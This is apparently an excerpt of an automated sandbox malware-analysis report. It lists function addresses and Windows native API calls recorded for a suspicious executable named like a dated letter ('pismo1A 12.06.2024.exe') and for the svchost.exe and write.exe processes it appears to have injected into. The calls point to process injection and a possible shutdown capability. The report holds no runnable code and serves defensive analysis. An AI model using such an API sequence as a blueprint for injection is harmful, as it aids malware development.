Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AB0 NtWaitForSingleObject,	2_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AF0 NtWriteFile,	2_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AD0 NtReadFile,	2_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F30 NtCreateSection,	2_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F60 NtCreateProcessEx,	2_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FB0 NtResumeThread,	2_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FA0 NtQuerySection,	2_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F90 NtProtectVirtualMemory,	2_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FE0 NtCreateFile,	2_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E30 NtWriteVirtualMemory,	2_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EA0 NtAdjustPrivilegesToken,	2_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E80 NtReadVirtualMemory,	2_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EE0 NtQueueApcThread,	2_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D30 NtUnmapViewOfSection,	2_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D10 NtMapViewOfSection,	2_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D00 NtSetInformationFile,	2_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DB0 NtEnumerateKey,	2_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DD0 NtDelayExecution,	2_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C00 NtQueryInformationProcess,	2_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C60 NtCreateKey,	2_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CA0 NtQueryInformationToken,	2_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CF0 NtOpenProcess,	2_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CC0 NtQueryVirtualMemory,	2_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373010 NtOpenDirectoryObject,	2_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373090 NtSetValueKey,	2_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033739B0 NtGetContextThread,	2_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D10 NtOpenProcessToken,	2_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D70 NtOpenThread,	2_2_03373D70
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D14650 NtSuspendThread,LdrInitializeThunk,	5_2_04D14650
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D14340 NtSetContextThread,LdrInitializeThunk,	5_2_04D14340
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04D12CA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04D12C70
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12C60 NtCreateKey,LdrInitializeThunk,	5_2_04D12C60
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12DD0 NtDelayExecution,LdrInitializeThunk,	5_2_04D12DD0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04D12DF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_04D12D10
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04D12D30
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_04D12EE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_04D12E80
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12FE0 NtCreateFile,LdrInitializeThunk,	5_2_04D12FE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12FB0 NtResumeThread,LdrInitializeThunk,	5_2_04D12FB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12F30 NtCreateSection,LdrInitializeThunk,	5_2_04D12F30
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12AD0 NtReadFile,LdrInitializeThunk,	5_2_04D12AD0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12AF0 NtWriteFile,LdrInitializeThunk,	5_2_04D12AF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04D12BF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_04D12BE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_04D12BA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12B60 NtClose,LdrInitializeThunk,	5_2_04D12B60
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D135C0 NtCreateMutant,LdrInitializeThunk,	5_2_04D135C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D139B0 NtGetContextThread,LdrInitializeThunk,	5_2_04D139B0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12CC0 NtQueryVirtualMemory,	5_2_04D12CC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12CF0 NtOpenProcess,	5_2_04D12CF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12C00 NtQueryInformationProcess,	5_2_04D12C00
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12DB0 NtEnumerateKey,	5_2_04D12DB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12D00 NtSetInformationFile,	5_2_04D12D00
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12EA0 NtAdjustPrivilegesToken,	5_2_04D12EA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12E30 NtWriteVirtualMemory,	5_2_04D12E30
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12F90 NtProtectVirtualMemory,	5_2_04D12F90
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12FA0 NtQuerySection,	5_2_04D12FA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12F60 NtCreateProcessEx,	5_2_04D12F60
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12AB0 NtWaitForSingleObject,	5_2_04D12AB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D12B80 NtQueryInformationFile,	5_2_04D12B80
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D13090 NtSetValueKey,	5_2_04D13090
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D13010 NtOpenDirectoryObject,	5_2_04D13010
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D13D70 NtOpenThread,	5_2_04D13D70
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D13D10 NtOpenProcessToken,	5_2_04D13D10
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B17AD0 NtReadFile,	5_2_02B17AD0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B17BC0 NtDeleteFile,	5_2_02B17BC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B17970 NtCreateFile,	5_2_02B17970
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B17C60 NtClose,	5_2_02B17C60
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B17DB0 NtAllocateVirtualMemory,	5_2_02B17DB0

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0070D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0070D5EB

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_00701201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00701201

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0070E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0070E8F6

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006A8060	0_2_006A8060
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00712046	0_2_00712046
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00708298	0_2_00708298
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006DE4FF	0_2_006DE4FF
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006D676B	0_2_006D676B
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00734873	0_2_00734873
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006ACAF0	0_2_006ACAF0
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006CCAA0	0_2_006CCAA0
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006BCC39	0_2_006BCC39
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006D6DD9	0_2_006D6DD9
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006BD07D	0_2_006BD07D
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006BB119	0_2_006BB119
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006A91C0	0_2_006A91C0
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C1394	0_2_006C1394
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C1706	0_2_006C1706
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C781B	0_2_006C781B
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006B997D	0_2_006B997D
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006A7920	0_2_006A7920
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C19B0	0_2_006C19B0
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C7A4A	0_2_006C7A4A
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C1C77	0_2_006C1C77
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C7CA7	0_2_006C7CA7
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0072BE44	0_2_0072BE44
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006D9EEE	0_2_006D9EEE
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006ABF40	0_2_006ABF40
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C1F32	0_2_006C1F32
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_010C35E0	0_2_010C35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E033	2_2_0040E033
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004030D0	2_2_004030D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004011E0	2_2_004011E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D3C3	2_2_0042D3C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402390	2_2_00402390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004044F4	2_2_004044F4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FD93	2_2_0040FD93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040260C	2_2_0040260C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402610	2_2_00402610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416683	2_2_00416683
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FFB3	2_2_0040FFB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034003E6	2_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C02C0	2_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330100	2_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F41A2	2_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034001AA	2_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F81CC	2_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364750	2_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C6E0	2_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03400591	2_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4420	2_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F2446	2_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EE4F6	2_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F6BD7	2_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340A9A6	2_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334A840	2_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033268B8	2_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E8F0	2_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360F30	2_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E2F30	2_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03382F28	2_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4F40	2_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BEFA0	2_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334CFE0	2_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332FC8	2_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEE26	2_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340E59	2_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352E90	2_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FCE93	2_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEEDB	2_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DCD1F	2_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334AD00	2_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03358DBF	2_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333ADE0	2_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340C00	2_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0CB5	2_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330CF2	2_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F132D	2_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332D34C	2_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0338739A	2_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033452A0	2_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E12ED	2_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B2C0	2_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340B16B	2_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332F172	2_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337516C	2_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334B1B0	2_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F70E9	2_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF0E0	2_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EF0CC	2_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033470C0	2_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF7B0	2_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385630	2_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F16CC	2_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7571	2_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034095C3	2_2_034095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DD5B0	2_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF43F	2_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03331460	2_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFB76	2_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FB80	2_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B5BF0	2_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337DBF9	2_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B3A6C	2_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFA49	2_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7A46	2_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DDAAC	2_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385AA0	2_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E1AA3	2_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EDAC6	2_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D5910	2_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349950	2_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B950	2_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AD800	2_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033438E0	2_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFF09	2_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFFB1	2_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03341F92	2_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303FD2	2_2_03303FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03303FD5	2_2_03303FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349EB0	2_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7D73	2_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F1D5A	2_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03343D40	2_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FDC0	2_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B9C32	2_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFCF2	2_2_033FFCF2
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D8E4F6	5_2_04D8E4F6
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D92446	5_2_04D92446
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D84420	5_2_04D84420
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DA0591	5_2_04DA0591
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE0535	5_2_04CE0535
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CFC6E0	5_2_04CFC6E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CDC7C0	5_2_04CDC7C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D04750	5_2_04D04750
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE0770	5_2_04CE0770
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D72000	5_2_04D72000
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D981CC	5_2_04D981CC
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DA01AA	5_2_04DA01AA
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D941A2	5_2_04D941A2
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D68158	5_2_04D68158
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CD0100	5_2_04CD0100
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D7A118	5_2_04D7A118
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D602C0	5_2_04D602C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D80274	5_2_04D80274
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DA03E6	5_2_04DA03E6
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CEE3F0	5_2_04CEE3F0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9A352	5_2_04D9A352
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CD0CF2	5_2_04CD0CF2
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D80CB5	5_2_04D80CB5
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE0C00	5_2_04CE0C00
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CDADE0	5_2_04CDADE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CF8DBF	5_2_04CF8DBF
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D7CD1F	5_2_04D7CD1F
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CEAD00	5_2_04CEAD00
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9EEDB	5_2_04D9EEDB
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9CE93	5_2_04D9CE93
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CF2E90	5_2_04CF2E90
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE0E59	5_2_04CE0E59
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9EE26	5_2_04D9EE26
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CD2FC8	5_2_04CD2FC8
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CECFE0	5_2_04CECFE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D5EFA0	5_2_04D5EFA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D54F40	5_2_04D54F40
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D00F30	5_2_04D00F30
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D82F30	5_2_04D82F30
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D22F28	5_2_04D22F28
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D0E8F0	5_2_04D0E8F0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CC68B8	5_2_04CC68B8
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE2840	5_2_04CE2840
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CEA840	5_2_04CEA840
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE29A0	5_2_04CE29A0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DAA9A6	5_2_04DAA9A6
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CF6962	5_2_04CF6962
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CDEA80	5_2_04CDEA80
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D96BD7	5_2_04D96BD7
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9AB40	5_2_04D9AB40
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CD1460	5_2_04CD1460
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9F43F	5_2_04D9F43F
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DA95C3	5_2_04DA95C3
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D7D5B0	5_2_04D7D5B0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D97571	5_2_04D97571
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D916CC	5_2_04D916CC
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D25630	5_2_04D25630
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9F7B0	5_2_04D9F7B0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CE70C0	5_2_04CE70C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D8F0CC	5_2_04D8F0CC
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D970E9	5_2_04D970E9
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D9F0E0	5_2_04D9F0E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CEB1B0	5_2_04CEB1B0
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04DAB16B	5_2_04DAB16B
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04D1516C	5_2_04D1516C
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CCF172	5_2_04CCF172
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_04CFB2C0	5_2_04CFB2C0
